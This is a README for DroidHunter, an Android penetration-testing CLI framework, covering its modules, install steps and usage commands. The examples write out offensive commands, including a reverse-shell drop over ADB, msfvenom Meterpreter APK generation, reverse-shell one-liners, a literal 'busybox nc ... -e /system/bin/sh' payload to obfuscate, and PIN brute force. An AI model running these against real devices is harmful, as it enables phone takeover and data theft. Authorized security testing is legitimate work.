Author: HexSecTeam | Instagram: @hexsecteam
β οΈ For authorized security testing and educational purposes only.
If DroidHunter helps your Android security research, education, or workflow, you can support the project with a small donation.
| Asset | Network | Address |
|---|---|---|
| USDT | Ethereum network (ERC-20) | 0x3E79B73e3ce33c6B860425DCB40c6D2f4F2aC508 |
β οΈ Only send USDT on the Ethereum network (ERC-20). Sending funds on another network may result in permanent loss.
DroidHunter is a comprehensive, CLI-based Android security assessment framework targeting ethical hackers and professional penetration testers. It integrates multiple attack surfaces into a single tool with a hacker-aesthetic terminal interface.
DroidHunter is developed by HexSec Team / HexSec Community for authorized Android security assessment, education, and professional penetration testing workflows.
Add your screenshot as
assets/droidhunter-preview.png.
| Module | Description |
|---|---|
| π± Device Manager | List devices, device info, manual/auto ADB WiFi, screenshot, logcat, file transfer |
| π APK Analyzer | Static decomposition: permissions, secrets, exported components, CVEs |
| π Network Scanner | Fast port scan, WiFi info, subnet discovery, MitM guide |
| π¨ Vulnerability Scanner | CVE mapping, root detection, insecure storage, WebView, task hijacking |
| π₯ Exploit Engine | Activity launch, broadcast trigger, content provider dump, deep link fuzzer, shell dropper |
| π― Payload Generator | msfvenom APK, reverse shell one-liners, ADB exploit scripts, obfuscation |
| π Report Generator | Dark-themed HTML report + JSON + CLI table with remediation advice |
| ποΈ Remote Control | Open Remote Screen via scrcpy from the interactive menu |
# 1. Clone / navigate to the tool directory
cd /path/to/droidhunter
# or
git clone https://github.com/hexsecteam/DroidHunter.git
#2. create a virtual environment
python -m venv venv
source venv/bin/activate
# 3. Install Python dependencies
pip3 install -r requirements.txt
# 4. (Optional) Install ADB
sudo apt install adb # Debian/Ubuntu
sudo pacman -S android-tools # Arch
# 5. (Optional for Remote Control) Install scrcpy
sudo apt install scrcpy
# 6. (Optional for payload generation) Install Metasploit
# https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.htmlpython3 droidhunter.py
# or
python3 droidhunter.py --interactiveThe interactive Remote Control menu supports Open Remote Screen through scrcpy for Android screen mirroring.
DroidHunter supports both Manual ADB WiFi Connect and Auto ADB WiFi Connect from the interactive menu. Auto ADB WiFi Connect requires the phone to be connected by USB first, USB Debugging enabled, and both devices on the same WiFi network.
# List connected devices
python3 droidhunter.py --devices
# Full device info
python3 droidhunter.py --device ABC123 --info
# Analyze APK + generate HTML report
python3 droidhunter.py --apk target.apk --report html --target-name "com.example.app"
# Port scan device
python3 droidhunter.py --device ABC123 --port-scan
# Full vulnerability scan
python3 droidhunter.py --device ABC123 --vuln-scan --pkg com.example.app
# Check for CVEs based on Android version
python3 droidhunter.py --device ABC123 --cve-check
# Check if device is rooted
python3 droidhunter.py --device ABC123 --root-check
# Capture logcat (200 lines)
python3 droidhunter.py --device ABC123 --logcat 200
# Capture screenshot
python3 droidhunter.py --device ABC123 --screenshot
# Enable ADB over WiFi
python3 droidhunter.py --device ABC123 --adb-wifi
# WiFi info
python3 droidhunter.py --device ABC123 --wifi-info
# SSL pinning check
python3 droidhunter.py --device ABC123 --ssl-pinning com.example.app
# MitM proxy setup guide
python3 droidhunter.py --mitm-guide
# Launch exported activity
python3 droidhunter.py --device ABC123 --exploit activity \
--pkg com.example.app --activity com.example.app.DebugActivity
# Deep link fuzzer
python3 droidhunter.py --device ABC123 --exploit deep-link \
--pkg com.example.app --scheme myapp
# Drop reverse shell via ADB
python3 droidhunter.py --device ABC123 --exploit shell-drop \
--lhost 192.168.1.100 --lport 4444
# Generate msfvenom APK payload
python3 droidhunter.py --payload reverse_tcp \
--lhost 192.168.1.100 --lport 4444 --payload-out evil.apk
# Generate reverse shell one-liners
python3 droidhunter.py --payload reverse-shells \
--lhost 192.168.1.100 --lport 4444
# Obfuscate a command
python3 droidhunter.py --payload obfuscate \
--raw-payload "busybox nc 10.0.0.1 4444 -e /system/bin/sh" \
--obfuscate-method base64
# Pull file from device
python3 droidhunter.py --device ABC123 --pull /sdcard/secret.txt
# Push file to device
python3 droidhunter.py --device ABC123 --push malware.apk /sdcard/malware.apk
# Discover live hosts on subnet
python3 droidhunter.py --discover 192.168.1
# Generate JSON + HTML report
python3 droidhunter.py --apk app.apk --device ABC123 --vuln-scan \
--pkg com.example --report both --target-name "Example Corp App"- Permission audit β flags 30+ dangerous Android permissions by severity (CRITICAL β LOW)
- Hardcoded secrets β scans DEX, XML, JSON, JS for API keys, passwords, AWS keys, Firebase configs, DB URLs
- Exported components β activities, services, receivers, providers
- File hashes β MD5, SHA1, SHA256
- Obfuscation detection, native libraries, embedded URLs & IPs
- Vulnerability heuristics β debuggable flag, backup enabled, no network security config
- CVE Mapping β 30+ CVEs mapped to Android SDK levels (Stagefright, BlueBorne, StrandHogg, BlueFrag, etc.)
- Root detection β su binary, Magisk, SuperSU, debuggable build
- Frida detection β checks running processes for Frida server
- Insecure data storage β SharedPreferences, SQLite, world-readable files
- WebView checks β JS enabled, file:// access
- Task hijacking β StrandHogg-style taskAffinity check
| Module | Description |
|---|---|
| Activity Launch | Launch exported activities without permission |
| Broadcast Trigger | Send malicious broadcast intents |
| Content Provider | Dump arbitrary content provider data |
| Deep Link Fuzzer | Fuzz 20+ deep link paths for unprotected endpoints |
| Frida Injection | Step-by-step Frida/objection injection guide |
| Reverse Shell Drop | Push & execute busybox/nc reverse shell via ADB |
| DB Extractor | Pull SQLite databases from app data directory |
| Lock Bypass | PIN brute force via ADB keyevents |
| Type | Description |
|---|---|
reverse_tcp |
msfvenom Android Meterpreter reverse TCP APK |
reverse_https |
msfvenom HTTPS reverse shell APK |
reverse-shells |
6 reverse shell one-liners (nc, bash, python3, perl, socat) |
adb-script |
Full ADB exploitation shell script |
obfuscate |
Base64 or hex payload obfuscation |
DroidHunter generates:
- HTML Report β dark glassmorphism theme, severity badges, finding cards with CVE links and remediation advice
- JSON Report β structured machine-readable output
- CLI Table β quick terminal summary sorted by severity (CRITICAL β LOW)
| Requirement | Purpose |
|---|---|
| Python 3.8+ | Runtime |
rich |
Terminal UI |
requests |
HTTP checks |
| ADB (optional) | Device interaction |
| scrcpy (optional) | Remote Android screen mirroring |
| Metasploit (optional) | APK payload generation |
| Frida (optional) | Runtime instrumentation |
| mitmproxy (optional) | Traffic interception |
DroidHunter is intended exclusively for authorized security assessments, CTF competitions, and educational research.
Unauthorized use of this tool against systems you do not own or have explicit written permission to test is illegal under the Computer Fraud and Abuse Act (CFAA), Computer Misuse Act, and equivalent laws in most jurisdictions.
The author HexSecTeam and contributors assume no liability for any misuse or damage caused by this tool.
